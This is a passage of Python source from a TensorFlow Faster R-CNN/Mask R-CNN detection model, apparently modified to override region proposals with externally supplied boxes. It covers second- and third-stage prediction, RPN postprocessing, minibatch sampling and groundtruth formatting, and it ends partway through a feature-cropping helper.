representing predicted (final) refined box encodings, where
total_num_proposals=batch_size*self._max_num_proposals. If using a
shared box across classes the shape will instead be
[total_num_proposals, 1, self._box_coder.code_size].
2) class_predictions_with_background: a 3-D tensor with shape
[total_num_proposals, num_classes + 1] containing class
predictions (logits) for each of the anchors, where
total_num_proposals=batch_size*self._max_num_proposals.
Note that this tensor *includes* background class predictions
(at class index 0).
3) num_proposals: An int32 tensor of shape [batch_size] representing the
number of proposals generated by the RPN. `num_proposals` allows us
to keep track of which entries are to be treated as zero paddings and
which are not since we always pad the number of proposals to be
`self.max_num_proposals` for each image.
4) proposal_boxes: A float32 tensor of shape
[batch_size, self.max_num_proposals, 4] representing
decoded proposal bounding boxes in absolute coordinates.
5) proposal_boxes_normalized: A float32 tensor of shape
[batch_size, self.max_num_proposals, 4] representing decoded proposal
bounding boxes in normalized coordinates. Can be used to override the
boxes proposed by the RPN, thus enabling one to extract features and
get box classification and prediction for externally selected areas
of the image.
6) box_classifier_features: a 4-D float32 tensor representing the
features for each proposal.
"""
image_shape_2d = self._image_batch_shape_2d(image_shape) # same as true shape
'''proposal_boxes_normalized, _, num_proposals = self._postprocess_rpn(
rpn_box_encodings, rpn_objectness_predictions_with_background,
anchors, image_shape_2d, true_image_shapes)'''
# Override RPN proposals
# proposal_boxes_normalized = tf.Print(proposal_boxes_normalized, [], message=("original size= " + str(proposal_boxes_normalized.shape[1])))
# normalize proposal boxes
def normalize_boxes(args):
proposal_boxes_per_image = args[0]
image_shape = args[1]
normalized_boxes_per_image = box_list_ops.to_normalized_coordinates(
box_list.BoxList(proposal_boxes_per_image), image_shape[0],
image_shape[1], check_range=False).get()
return normalized_boxes_per_image
def to_absolute_boxes(args):
proposal_boxes_per_image = args[0]
image_shape = args[1]
absolute_boxes_per_image = box_list_ops.to_absolute_coordinates(
box_list.BoxList(proposal_boxes_per_image), image_shape[0],
image_shape[1], check_range=False).get()
return absolute_boxes_per_image
proposal_boxes = tf.constant(self.proposals, dtype='float32')
proposal_boxes = shape_utils.static_or_dynamic_map_fn(
to_absolute_boxes, elems=[proposal_boxes, true_image_shapes], dtype=tf.float32)
num_proposals = tf.constant([proposal_boxes.shape[1]], dtype='int32')
# single_image_boxlist = box_list.BoxList(proposals_absolute)
# proposal_boxes = self._sample_box_classifier_minibatch_single_image(single_image_boxlist, num_proposals, groundtruth_boxlists[0],
# groundtruth_classes_with_background_list[0], groundtruth_weights_list[0]).get()
# Minibatch sampling during training
if self._is_training:
proposal_boxes = tf.stop_gradient(proposal_boxes)
if not self._hard_example_miner:
placeholder_scores = tf.zeros((1, proposal_boxes.shape[1], 2))
#proposal_boxes = tf.Print(proposal_boxes, [proposal_boxes], message="1: ")
(groundtruth_boxlists, groundtruth_classes_with_background_list, _,
groundtruth_weights_list
) = self._format_groundtruth_data(true_image_shapes)
(proposal_boxes, _, num_proposals) = self._sample_box_classifier_batch(
proposal_boxes, placeholder_scores, num_proposals,
groundtruth_boxlists, groundtruth_classes_with_background_list,
groundtruth_weights_list, true_image_shapes[0])
#proposal_boxes = tf.Print(proposal_boxes, [proposal_boxes], message="2: ")
#proposal_boxes = tf.Print(proposal_boxes, [], message=("Shape of pboxes " + str(proposal_boxes.shape[1])))
#num_proposals = tf.Print(num_proposals, [num_proposals])
proposal_boxes_normalized = shape_utils.static_or_dynamic_map_fn(
normalize_boxes, elems=[proposal_boxes, true_image_shapes], dtype=tf.float32)
#proposal_boxes_normalized = tf.Print(proposal_boxes_normalized, [proposal_boxes_normalized], message="3: ")
#proposal_boxes_normalized = tf.Print(proposal_boxes_normalized, [tf.shape(proposal_boxes_normalized)], message=("Shape of pboxes "))
#proposal_boxes_normalized = tf.constant(self.proposals[:, 0:64, :], dtype='float32')
#proposal_boxes_normalized = tf.Print(proposal_boxes_normalized, [], message=("Shape of minibatch " + str(proposal_boxes_normalized.shape[1])))
flattened_proposal_feature_maps = (
self._compute_second_stage_input_feature_maps(
rpn_features_to_crop, proposal_boxes_normalized))
#flattened_proposal_feature_maps = tf.stop_gradient(flattened_proposal_feature_maps)
#flattened_proposal_feature_maps = tf.Print(flattened_proposal_feature_maps, [], message=("Cropped props : " + str(flattened_proposal_feature_maps.shape)))
box_classifier_features = (
self._feature_extractor.extract_box_classifier_features(
flattened_proposal_feature_maps,
scope=self.second_stage_feature_extractor_scope))
if self._mask_rcnn_box_predictor.is_keras_model:
box_predictions = self._mask_rcnn_box_predictor(
[box_classifier_features],
prediction_stage=2)
else:
box_predictions = self._mask_rcnn_box_predictor.predict(
[box_classifier_features],
num_predictions_per_location=[1],
scope=self.second_stage_box_predictor_scope,
prediction_stage=2)
refined_box_encodings = tf.squeeze(
box_predictions[box_predictor.BOX_ENCODINGS],
axis=1, name='all_refined_box_encodings')
class_predictions_with_background = tf.squeeze(
box_predictions[box_predictor.CLASS_PREDICTIONS_WITH_BACKGROUND],
axis=1, name='all_class_predictions_with_background')
absolute_proposal_boxes = ops.normalized_to_image_coordinates(
proposal_boxes_normalized, image_shape, self._parallel_iterations)
prediction_dict = {
'refined_box_encodings': refined_box_encodings,
'class_predictions_with_background':
class_predictions_with_background,
'num_proposals': num_proposals,
'proposal_boxes': absolute_proposal_boxes,
'box_classifier_features': box_classifier_features,
'proposal_boxes_normalized': proposal_boxes_normalized,
}
return prediction_dict
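# Note on the proposal override above (added comment): self.proposals is assumed
# to be a float array of shape [batch_size, num_proposals, 4] in normalized
# [ymin, xmin, ymax, xmax] coordinates, since it is first converted to absolute
# coordinates with `to_absolute_boxes` and re-normalized only after the optional
# minibatch sampling step.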
def _predict_third_stage(self, prediction_dict, image_shapes):
"""Predicts non-box, non-class outputs using refined detections.
For training, masks are predicted directly on the box_classifier_features,
which are region-features from the initial anchor boxes.
For inference, this happens after calling the post-processing stage, such
that masks are only calculated for the top scored boxes.
Args:
prediction_dict: a dictionary holding "raw" prediction tensors:
1) refined_box_encodings: a 3-D tensor with shape
[total_num_proposals, num_classes, self._box_coder.code_size]
representing predicted (final) refined box encodings, where
total_num_proposals=batch_size*self._max_num_proposals. If using a
shared box across classes the shape will instead be
[total_num_proposals, 1, self._box_coder.code_size].
2) class_predictions_with_background: a 3-D tensor with shape
[total_num_proposals, num_classes + 1] containing class
predictions (logits) for each of the anchors, where
total_num_proposals=batch_size*self._max_num_proposals.
Note that this tensor *includes* background class predictions
(at class index 0).
3) num_proposals: An int32 tensor of shape [batch_size] representing the
number of proposals generated by the RPN. `num_proposals` allows us
to keep track of which entries are to be treated as zero paddings and
which are not since we always pad the number of proposals to be
`self.max_num_proposals` for each image.
4) proposal_boxes: A float32 tensor of shape
[batch_size, self.max_num_proposals, 4] representing
decoded proposal bounding boxes in absolute coordinates.
5) box_classifier_features: a 4-D float32 tensor representing the
features for each proposal.
image_shapes: A 2-D int32 tensor of shape [batch_size, 3] containing
shapes of images in the batch.
Returns:
prediction_dict: a dictionary that in addition to the input predictions
does hold the following predictions as well:
1) mask_predictions: a 4-D tensor with shape
[batch_size, max_detection, mask_height, mask_width] containing
instance mask predictions.
"""
if self._is_training:
curr_box_classifier_features = prediction_dict['box_classifier_features']
detection_classes = prediction_dict['class_predictions_with_background']
if self._mask_rcnn_box_predictor.is_keras_model:
mask_predictions = self._mask_rcnn_box_predictor(
[curr_box_classifier_features],
prediction_stage=3)
else:
mask_predictions = self._mask_rcnn_box_predictor.predict(
[curr_box_classifier_features],
num_predictions_per_location=[1],
scope=self.second_stage_box_predictor_scope,
prediction_stage=3)
prediction_dict['mask_predictions'] = tf.squeeze(mask_predictions[
box_predictor.MASK_PREDICTIONS], axis=1)
else:
detections_dict = self._postprocess_box_classifier(
prediction_dict['refined_box_encodings'],
prediction_dict['class_predictions_with_background'],
prediction_dict['proposal_boxes'],
prediction_dict['num_proposals'],
image_shapes)
prediction_dict.update(detections_dict)
detection_boxes = detections_dict[
fields.DetectionResultFields.detection_boxes]
detection_classes = detections_dict[
fields.DetectionResultFields.detection_classes]
rpn_features_to_crop = prediction_dict['rpn_features_to_crop']
batch_size = tf.shape(detection_boxes)[0]
max_detection = tf.shape(detection_boxes)[1]
flattened_detected_feature_maps = (
self._compute_second_stage_input_feature_maps(
rpn_features_to_crop, detection_boxes))
curr_box_classifier_features = (
self._feature_extractor.extract_box_classifier_features(
flattened_detected_feature_maps,
scope=self.second_stage_feature_extractor_scope))
if self._mask_rcnn_box_predictor.is_keras_model:
mask_predictions = self._mask_rcnn_box_predictor(
[curr_box_classifier_features],
prediction_stage=3)
else:
mask_predictions = self._mask_rcnn_box_predictor.predict(
[curr_box_classifier_features],
num_predictions_per_location=[1],
scope=self.second_stage_box_predictor_scope,
prediction_stage=3)
detection_masks = tf.squeeze(mask_predictions[
box_predictor.MASK_PREDICTIONS], axis=1)
_, num_classes, mask_height, mask_width = (
detection_masks.get_shape().as_list())
_, max_detection = detection_classes.get_shape().as_list()
if num_classes > 1:
detection_masks = self._gather_instance_masks(
detection_masks, detection_classes)
prediction_dict[fields.DetectionResultFields.detection_masks] = (
tf.reshape(detection_masks,
[batch_size, max_detection, mask_height, mask_width]))
return prediction_dict
def _gather_instance_masks(self, instance_masks, classes):
"""Gathers the masks that correspond to classes.
Args:
instance_masks: A 4-D float32 tensor with shape
[K, num_classes, mask_height, mask_width].
classes: A 2-D int32 tensor with shape [batch_size, max_detection].
Returns:
masks: a 3-D float32 tensor with shape [K, mask_height, mask_width].
"""
_, num_classes, height, width = instance_masks.get_shape().as_list()
k = tf.shape(instance_masks)[0]
instance_masks = tf.reshape(instance_masks, [-1, height, width])
classes = tf.to_int32(tf.reshape(classes, [-1]))
gather_idx = tf.range(k) * num_classes + classes
return tf.gather(instance_masks, gather_idx)
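# Illustrative example (added comment): with num_classes = 3 and
# classes = [[2, 0]], the flattened masks are indexed with
# gather_idx = [0 * 3 + 2, 1 * 3 + 0] = [2, 3], i.e. one mask per detection,
# selected according to its predicted class.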
def _extract_rpn_feature_maps(self, preprocessed_inputs):
"""Extracts RPN features.
This function extracts two feature maps: a feature map to be directly
fed to a box predictor (to predict location and objectness scores for
proposals) and a feature map from which to crop regions which will then
be sent to the second stage box classifier.
Args:
preprocessed_inputs: a [batch, height, width, channels] image tensor.
Returns:
rpn_box_predictor_features: A 4-D float32 tensor with shape
[batch, height, width, depth] to be used for predicting proposal boxes
and corresponding objectness scores.
rpn_features_to_crop: A 4-D float32 tensor with shape
[batch, height, width, depth] representing image features to crop using
the proposals boxes.
anchors: A BoxList representing anchors (for the RPN) in
absolute coordinates.
image_shape: A 1-D tensor representing the input image shape.
"""
image_shape = tf.shape(preprocessed_inputs)
rpn_features_to_crop, _ = self._feature_extractor.extract_proposal_features(
preprocessed_inputs, scope=self.first_stage_feature_extractor_scope)
feature_map_shape = tf.shape(rpn_features_to_crop)
anchors = box_list_ops.concatenate(
self._first_stage_anchor_generator.generate([(feature_map_shape[1],
feature_map_shape[2])]))
with slim.arg_scope(self._first_stage_box_predictor_arg_scope_fn()):
kernel_size = self._first_stage_box_predictor_kernel_size
rpn_box_predictor_features = slim.conv2d(
rpn_features_to_crop,
self._first_stage_box_predictor_depth,
kernel_size=[kernel_size, kernel_size],
rate=self._first_stage_atrous_rate,
activation_fn=tf.nn.relu6)
return (rpn_box_predictor_features, rpn_features_to_crop,
anchors, image_shape)
def _predict_rpn_proposals(self, rpn_box_predictor_features):
"""Adds box predictors to RPN feature map to predict proposals.
Note resulting tensors will not have been postprocessed.
Args:
rpn_box_predictor_features: A 4-D float32 tensor with shape
[batch, height, width, depth] to be used for predicting proposal boxes
and corresponding objectness scores.
Returns:
box_encodings: 3-D float tensor of shape
[batch_size, num_anchors, self._box_coder.code_size] containing
predicted boxes.
objectness_predictions_with_background: 3-D float tensor of shape
[batch_size, num_anchors, 2] containing class
predictions (logits) for each of the anchors. Note that this
tensor *includes* background class predictions (at class index 0).
Raises:
RuntimeError: if the anchor generator generates anchors corresponding to
multiple feature maps. We currently assume that a single feature map
is generated for the RPN.
"""
num_anchors_per_location = (
self._first_stage_anchor_generator.num_anchors_per_location())
if len(num_anchors_per_location) != 1:
raise RuntimeError('anchor_generator is expected to generate anchors '
'corresponding to a single feature map.')
if self._first_stage_box_predictor.is_keras_model:
box_predictions = self._first_stage_box_predictor(
[rpn_box_predictor_features])
else:
box_predictions = self._first_stage_box_predictor.predict(
[rpn_box_predictor_features],
num_anchors_per_location,
scope=self.first_stage_box_predictor_scope)
box_encodings = tf.concat(
box_predictions[box_predictor.BOX_ENCODINGS], axis=1)
objectness_predictions_with_background = tf.concat(
box_predictions[box_predictor.CLASS_PREDICTIONS_WITH_BACKGROUND],
axis=1)
return (tf.squeeze(box_encodings, axis=2),
objectness_predictions_with_background)
def _remove_invalid_anchors_and_predictions(
self,
box_encodings,
objectness_predictions_with_background,
anchors_boxlist,
clip_window):
"""Removes anchors that (partially) fall outside an image.
Also removes associated box encodings and objectness predictions.
Args:
box_encodings: 3-D float tensor of shape
[batch_size, num_anchors, self._box_coder.code_size] containing
predicted boxes.
objectness_predictions_with_background: 3-D float tensor of shape
[batch_size, num_anchors, 2] containing class
predictions (logits) for each of the anchors. Note that this
tensor *includes* background class predictions (at class index 0).
anchors_boxlist: A BoxList representing num_anchors anchors (for the RPN)
in absolute coordinates.
clip_window: a 1-D tensor representing the [ymin, xmin, ymax, xmax]
extent of the window to clip/prune to.
Returns:
box_encodings: 4-D float tensor of shape
[batch_size, num_valid_anchors, self._box_coder.code_size] containing
predicted boxes, where num_valid_anchors <= num_anchors
objectness_predictions_with_background: 2-D float tensor of shape
[batch_size, num_valid_anchors, 2] containing class
predictions (logits) for each of the anchors, where
num_valid_anchors <= num_anchors. Note that this
tensor *includes* background class predictions (at class index 0).
anchors: A BoxList representing num_valid_anchors anchors (for the RPN) in
absolute coordinates.
"""
pruned_anchors_boxlist, keep_indices = box_list_ops.prune_outside_window(
anchors_boxlist, clip_window)
def _batch_gather_kept_indices(predictions_tensor):
return shape_utils.static_or_dynamic_map_fn(
partial(tf.gather, indices=keep_indices),
elems=predictions_tensor,
dtype=tf.float32,
parallel_iterations=self._parallel_iterations,
back_prop=True)
return (_batch_gather_kept_indices(box_encodings),
_batch_gather_kept_indices(objectness_predictions_with_background),
pruned_anchors_boxlist)
def _flatten_first_two_dimensions(self, inputs):
"""Flattens `K-d` tensor along batch dimension to be a `(K-1)-d` tensor.
Converts `inputs` with shape [A, B, ..., depth] into a tensor of shape
[A * B, ..., depth].
Args:
inputs: A float tensor with shape [A, B, ..., depth]. Note that the first
two and last dimensions must be statically defined.
Returns:
A float tensor with shape [A * B, ..., depth] (where the first and last
dimensions are statically defined).
"""
combined_shape = shape_utils.combined_static_and_dynamic_shape(inputs)
flattened_shape = tf.stack([combined_shape[0] * combined_shape[1]] +
combined_shape[2:])
return tf.reshape(inputs, flattened_shape)
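# Illustrative example (added comment): an input of shape [2, 300, 7, 7, 256]
# (e.g. batch_size=2, max_num_proposals=300, 7x7x256 cropped features) is
# reshaped to [600, 7, 7, 256].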
def postprocess(self, prediction_dict, true_image_shapes):
"""Convert prediction tensors to final detections.
This function converts raw predictions tensors to final detection results.
See base class for output format conventions. Note also that by default,
scores are to be interpreted as logits, but if a score_converter is used,
then scores are remapped (and may thus have a different interpretation).
If number_of_stages=1, the returned results represent proposals from the
first stage RPN and are padded to have self.max_num_proposals for each
image; otherwise, the results can be interpreted as multiclass detections
from the full two-stage model and are padded to self._max_detections.
Args:
prediction_dict: a dictionary holding prediction tensors (see the
documentation for the predict method. If number_of_stages=1, we
expect prediction_dict to contain `rpn_box_encodings`,
`rpn_objectness_predictions_with_background`, `rpn_features_to_crop`,
and `anchors` fields. Otherwise we expect prediction_dict to
additionally contain `refined_box_encodings`,
`class_predictions_with_background`, `num_proposals`,
`proposal_boxes` and, optionally, `mask_predictions` fields.
true_image_shapes: int32 tensor of shape [batch, 3] where each row is
of the form [height, width, channels] indicating the shapes
of true images in the resized images, as resized images can be padded
with zeros.
Returns:
detections: a dictionary containing the following fields
detection_boxes: [batch, max_detection, 4]
detection_scores: [batch, max_detections]
detection_classes: [batch, max_detections]
(this entry is only created if rpn_mode=False)
num_detections: [batch]
Raises:
ValueError: If `predict` is called before `preprocess`.
"""
with tf.name_scope('FirstStagePostprocessor'):
if self._number_of_stages == 1:
# Michele's addition
proposal_boxes, proposal_scores, num_proposals = self._postprocess_rpn(
prediction_dict['rpn_box_encodings'],
prediction_dict['rpn_objectness_predictions_with_background'],
prediction_dict['anchors'],
true_image_shapes,
true_image_shapes)
return {
fields.DetectionResultFields.detection_boxes: proposal_boxes,
fields.DetectionResultFields.detection_scores: proposal_scores,
fields.DetectionResultFields.num_detections:
tf.to_float(num_proposals),
}
# TODO(jrru): Remove mask_predictions from _post_process_box_classifier.
with tf.name_scope('SecondStagePostprocessor'):
if (self._number_of_stages == 2 or
(self._number_of_stages == 3 and self._is_training)):
mask_predictions = prediction_dict.get(box_predictor.MASK_PREDICTIONS)
detections_dict = self._postprocess_box_classifier(
prediction_dict['refined_box_encodings'],
prediction_dict['class_predictions_with_background'],
prediction_dict['proposal_boxes'],
prediction_dict['num_proposals'],
true_image_shapes,
mask_predictions=mask_predictions)
return detections_dict
if self._number_of_stages == 3:
# Post processing is already performed in 3rd stage. We need to transfer
# postprocessed tensors from `prediction_dict` to `detections_dict`.
detections_dict = {}
for key in prediction_dict:
if key == fields.DetectionResultFields.detection_masks:
detections_dict[key] = tf.sigmoid(prediction_dict[key])
elif 'detection' in key:
detections_dict[key] = prediction_dict[key]
return detections_dict
def _postprocess_rpn(self,
rpn_box_encodings_batch,
rpn_objectness_predictions_with_background_batch,
anchors,
image_shapes,
true_image_shapes):
"""Converts first stage prediction tensors from the RPN to proposals.
    This function decodes the raw RPN predictions and runs non-max suppression
    on the result.
Note that the behavior of this function is slightly modified during
training --- specifically, we stop the gradient from passing through the
proposal boxes and we only return a balanced sampled subset of proposals
with size `second_stage_batch_size`.
Args:
rpn_box_encodings_batch: A 3-D float32 tensor of shape
[batch_size, num_anchors, self._box_coder.code_size] containing
predicted proposal box encodings.
rpn_objectness_predictions_with_background_batch: A 3-D float tensor of
shape [batch_size, num_anchors, 2] containing objectness predictions
(logits) for each of the anchors with 0 corresponding to background
and 1 corresponding to object.
anchors: A 2-D tensor of shape [num_anchors, 4] representing anchors
for the first stage RPN. Note that `num_anchors` can differ depending
on whether the model is created in training or inference mode.
image_shapes: A 2-D tensor of shape [batch, 3] containing the shapes of
images in the batch.
true_image_shapes: int32 tensor of shape [batch, 3] where each row is
of the form [height, width, channels] indicating the shapes
of true images in the resized images, as resized images can be padded
with zeros.
Returns:
proposal_boxes: A float tensor with shape
[batch_size, max_num_proposals, 4] representing the (potentially zero
padded) proposal boxes for all images in the batch. These boxes are
represented as normalized coordinates.
proposal_scores: A float tensor with shape
[batch_size, max_num_proposals] representing the (potentially zero
padded) proposal objectness scores for all images in the batch.
num_proposals: A Tensor of type `int32`. A 1-D tensor of shape [batch]
representing the number of proposals predicted for each image in
the batch.
"""
rpn_box_encodings_batch = tf.expand_dims(rpn_box_encodings_batch, axis=2)
rpn_encodings_shape = shape_utils.combined_static_and_dynamic_shape(
rpn_box_encodings_batch)
tiled_anchor_boxes = tf.tile(
tf.expand_dims(anchors, 0), [rpn_encodings_shape[0], 1, 1])
proposal_boxes = self._batch_decode_boxes(rpn_box_encodings_batch,
tiled_anchor_boxes)
proposal_boxes = tf.squeeze(proposal_boxes, axis=2)
rpn_objectness_softmax_without_background = tf.nn.softmax(
rpn_objectness_predictions_with_background_batch)[:, :, 1]
clip_window = self._compute_clip_window(image_shapes)
(proposal_boxes, proposal_scores, _, _, _,
num_proposals) = post_processing.batch_multiclass_non_max_suppression(
tf.expand_dims(proposal_boxes, axis=2),
tf.expand_dims(rpn_objectness_softmax_without_background,
axis=2),
self._first_stage_nms_score_threshold,
self._first_stage_nms_iou_threshold,
self._first_stage_max_proposals,
self._first_stage_max_proposals,
clip_window=clip_window)
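    # The class dimension of size 1 added via expand_dims above makes the
    # multiclass NMS op behave as class-agnostic NMS over the RPN proposals;
    # its outputs are padded or clipped to self._first_stage_max_proposals
    # boxes per image.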
if self._is_training:
proposal_boxes = tf.stop_gradient(proposal_boxes)
if not self._hard_example_miner:
(groundtruth_boxlists, groundtruth_classes_with_background_list, _,
groundtruth_weights_list
) = self._format_groundtruth_data(true_image_shapes)
(proposal_boxes, proposal_scores,
num_proposals) = self._sample_box_classifier_batch(
proposal_boxes, proposal_scores, num_proposals,
groundtruth_boxlists, groundtruth_classes_with_background_list,
groundtruth_weights_list)
# normalize proposal boxes
def normalize_boxes(args):
proposal_boxes_per_image = args[0]
image_shape = args[1]
normalized_boxes_per_image = box_list_ops.to_normalized_coordinates(
box_list.BoxList(proposal_boxes_per_image), image_shape[0],
image_shape[1], check_range=False).get()
return normalized_boxes_per_image
normalized_proposal_boxes = shape_utils.static_or_dynamic_map_fn(
normalize_boxes, elems=[proposal_boxes, image_shapes], dtype=tf.float32)
return normalized_proposal_boxes, proposal_scores, num_proposals
def _sample_box_classifier_batch(
self,
proposal_boxes,
proposal_scores,
num_proposals,
groundtruth_boxlists,
groundtruth_classes_with_background_list,
groundtruth_weights_list,
debug=None):
"""Samples a minibatch for second stage.
Args:
proposal_boxes: A float tensor with shape
[batch_size, num_proposals, 4] representing the (potentially zero
padded) proposal boxes for all images in the batch. These boxes are
represented in absolute coordinates.
proposal_scores: A float tensor with shape
[batch_size, num_proposals] representing the (potentially zero
padded) proposal objectness scores for all images in the batch.
num_proposals: A Tensor of type `int32`. A 1-D tensor of shape [batch]
representing the number of proposals predicted for each image in
the batch.
groundtruth_boxlists: A list of BoxLists containing (absolute) coordinates
of the groundtruth boxes.
groundtruth_classes_with_background_list: A list of 2-D one-hot
(or k-hot) tensors of shape [num_boxes, num_classes+1] containing the
class targets with the 0th index assumed to map to the background class.
      groundtruth_weights_list: A list of 1-D tensors of shape [num_boxes]
        indicating the weight associated with the groundtruth boxes.
      debug: (optional) true image shapes, forwarded to the per-image
        minibatch sampler for debugging.
Returns:
proposal_boxes: A float tensor with shape
[batch_size, second_stage_batch_size, 4] representing the (potentially
zero padded) proposal boxes for all images in the batch. These boxes
are represented in absolute coordinates.
proposal_scores: A float tensor with shape
[batch_size, second_stage_batch_size] representing the (potentially zero
padded) proposal objectness scores for all images in the batch.
num_proposals: A Tensor of type `int32`. A 1-D tensor of shape [batch]
representing the number of proposals predicted for each image in
the batch.
"""
single_image_proposal_box_sample = []
single_image_proposal_score_sample = []
single_image_num_proposals_sample = []
for (single_image_proposal_boxes,
single_image_proposal_scores,
single_image_num_proposals,
single_image_groundtruth_boxlist,
single_image_groundtruth_classes_with_background,
single_image_groundtruth_weights) in zip(
tf.unstack(proposal_boxes),
tf.unstack(proposal_scores),
tf.unstack(num_proposals),
groundtruth_boxlists,
groundtruth_classes_with_background_list,
groundtruth_weights_list):
single_image_boxlist = box_list.BoxList(single_image_proposal_boxes)
single_image_boxlist.add_field(fields.BoxListFields.scores,
single_image_proposal_scores)
sampled_boxlist = self._sample_box_classifier_minibatch_single_image(
single_image_boxlist,
single_image_num_proposals,
single_image_groundtruth_boxlist,
single_image_groundtruth_classes_with_background,
single_image_groundtruth_weights,
debug)
# sampled_boxlist.set(tf.Print(sampled_boxlist.get(), [sampled_boxlist.num_boxes()], message="sample size "))
sampled_padded_boxlist = box_list_ops.pad_or_clip_box_list(
sampled_boxlist,
num_boxes=self._second_stage_batch_size)
single_image_num_proposals_sample.append(tf.minimum(
sampled_boxlist.num_boxes(),
self._second_stage_batch_size))
bb = sampled_padded_boxlist.get()
#bb = tf.Print(bb, [single_image_groundtruth_boxlist.num_boxes()], message=("After padding and num of GT" + str(bb.shape)))
single_image_proposal_box_sample.append(bb)
single_image_proposal_score_sample.append(
sampled_padded_boxlist.get_field(fields.BoxListFields.scores))
return (tf.stack(single_image_proposal_box_sample),
tf.stack(single_image_proposal_score_sample),
tf.stack(single_image_num_proposals_sample))
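  # Each image is sampled independently above and the per-image results are
  # re-stacked, so the returned tensors have a fixed second dimension of
  # self._second_stage_batch_size (zero padded when fewer proposals survive).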
def _format_groundtruth_data(self, true_image_shapes, stage='detection'):
"""Helper function for preparing groundtruth data for target assignment.
In order to be consistent with the model.DetectionModel interface,
groundtruth boxes are specified in normalized coordinates and classes are
specified as label indices with no assumed background category. To prepare
for target assignment, we:
    1) convert boxes to absolute coordinates,
    2) add a background class at class index 0, and
    3) resize groundtruth instance masks, if available, to match image_shape.
Args:
true_image_shapes: int32 tensor of shape [batch, 3] where each row is
of the form [height, width, channels] indicating the shapes
of true images in the resized images, as resized images can be padded
with zeros.
Returns:
groundtruth_boxlists: A list of BoxLists containing (absolute) coordinates
of the groundtruth boxes.
groundtruth_classes_with_background_list: A list of 2-D one-hot
(or k-hot) tensors of shape [num_boxes, num_classes+1] containing the
class targets with the 0th index assumed to map to the background class.
groundtruth_masks_list: If present, a list of 3-D tf.float32 tensors of
shape [num_boxes, image_height, image_width] containing instance masks.
        This is set to None if no masks exist in the provided groundtruth.
      groundtruth_weights_list: A list of 1-D tf.float32 tensors of shape
        [num_boxes] containing weights for the groundtruth boxes.
"""
groundtruth_boxlists = [
box_list_ops.to_absolute_coordinates(
box_list.BoxList(boxes), true_image_shapes[i, 0],
true_image_shapes[i, 1])
for i, boxes in enumerate(
self.groundtruth_lists(fields.BoxListFields.boxes))
]
groundtruth_classes_with_background_list = [
tf.to_float(
tf.pad(one_hot_encoding, [[0, 0], [1, 0]], mode='CONSTANT'))
for one_hot_encoding in self.groundtruth_lists(
fields.BoxListFields.classes)]
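    # E.g. (illustrative): with two classes, a groundtruth one-hot row [1, 0]
    # becomes [0, 1, 0] after the zero-column pad above, reserving index 0 for
    # the implicit background class.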
groundtruth_masks_list = self._groundtruth_lists.get(
fields.BoxListFields.masks)
if groundtruth_masks_list is not None:
resized_masks_list = []
for mask in groundtruth_masks_list:
_, resized_mask, _ = self._image_resizer_fn(
# Reuse the given `image_resizer_fn` to resize groundtruth masks.
# `mask` tensor for an image is of the shape [num_masks,
            # image_height, image_width]. Below we create a dummy image of
            # the shape [image_height, image_width, 1] to use with
# `image_resizer_fn`.
image=tf.zeros(tf.stack([tf.shape(mask)[1], tf.shape(mask)[2], 1])),
masks=mask)
resized_masks_list.append(resized_mask)
groundtruth_masks_list = resized_masks_list
if self.groundtruth_has_field(fields.BoxListFields.weights):
groundtruth_weights_list = self.groundtruth_lists(
fields.BoxListFields.weights)
else:
# Set weights for all batch elements equally to 1.0
groundtruth_weights_list = []
for groundtruth_classes in groundtruth_classes_with_background_list:
num_gt = tf.shape(groundtruth_classes)[0]
groundtruth_weights = tf.ones(num_gt)
groundtruth_weights_list.append(groundtruth_weights)
return (groundtruth_boxlists, groundtruth_classes_with_background_list,
groundtruth_masks_list, groundtruth_weights_list)
def _sample_box_classifier_minibatch_single_image(
self, proposal_boxlist, num_valid_proposals, groundtruth_boxlist,
groundtruth_classes_with_background, groundtruth_weights, debug=None):
"""Samples a mini-batch of proposals to be sent to the box classifier.
Helper function for self._postprocess_rpn.
Args:
proposal_boxlist: A BoxList containing K proposal boxes in absolute
coordinates.
num_valid_proposals: Number of valid proposals in the proposal boxlist.
groundtruth_boxlist: A Boxlist containing N groundtruth object boxes in
absolute coordinates.
groundtruth_classes_with_background: A tensor with shape
`[N, self.num_classes + 1]` representing groundtruth classes. The
classes are assumed to be k-hot encoded, and include background as the
zero-th class.
groundtruth_weights: Weights attached to the groundtruth_boxes.
      debug: (optional) contains the true_image_shape, used for debugging.
Returns:
      a BoxList containing the sampled proposals.
"""
(cls_targets, cls_weights, _, _, _) = self._detector_target_assigner.assign(
proposal_boxlist,
groundtruth_boxlist,
groundtruth_classes_with_background,
unmatched_class_label=tf.constant(
[1] + self._num_classes * [0], dtype=tf.float32),
groundtruth_weights=groundtruth_weights)
# Selects all boxes as candidates if none of them is selected according
# to cls_weights. This could happen as boxes within certain IOU ranges
# are ignored. If triggered, the selected boxes will still be ignored
# during loss computation.
positive_indicator = tf.greater(tf.argmax(cls_targets, axis=1), 0)
# Debug target mapping
#positive_indicator = tf.Print(positive_indicator, [positive_indicator, box_list_ops.to_normalized_coordinates(groundtruth_boxlist, debug[0], debug[1]).get()], summarize=999999)
valid_indicator = tf.logical_and(
tf.range(proposal_boxlist.num_boxes()) < num_valid_proposals,
cls_weights > 0
)
sampled_indices = self._second_stage_sampler.subsample(
valid_indicator,
self._second_stage_batch_size,
positive_indicator)
return box_list_ops.boolean_mask(proposal_boxlist, sampled_indices)
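  # Sampling sketch: `positive_indicator` marks proposals whose assigned target
  # is a non-background class, `valid_indicator` drops both the zero-padded
  # proposals and those ignored by the target assigner (cls_weights == 0), and
  # the balanced sampler then draws at most self._second_stage_batch_size
  # proposals from the valid set.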
def _compute_second_stage_input_feature_maps(self, features_to_crop,
proposal_boxes_normalized):
"""Crops to a set of proposals from the feature map for a batch of images.
Helper function for self._postprocess_rpn. This function calls
`tf.image.crop_and_resize` to create the feature map to be passed to the
second stage box classifier for each proposal.
Args:
features_to_crop: A float32 tensor with shape
[batch_size, height, width, depth]
proposal_boxes_normalized: A float32 tensor with shape [batch_size,
num_proposals, box_code_size] containing proposal boxes in
normalized coordinates.
Returns:
A float32 tensor with shape [K, new_height, new_width, depth].
"""
def get_box_inds(proposals):
proposals_shape = proposals.get_shape().as_list()
if any(dim is None for dim in proposals_shape):
proposals_shape = tf.shape(proposals)
ones_mat = tf.ones(proposals_shape[:2], dtype=tf.int32)
multiplier = tf.expand_dims(
tf.range(start=0, limit=proposals_shape[0]), 1)
return tf.reshape(ones_mat * multiplier, [-1])
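    # E.g. (illustrative): for proposals_shape == [2, 3], get_box_inds returns
    # [0, 0, 0, 1, 1, 1], i.e. the image index that each flattened proposal
    # should be cropped from.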
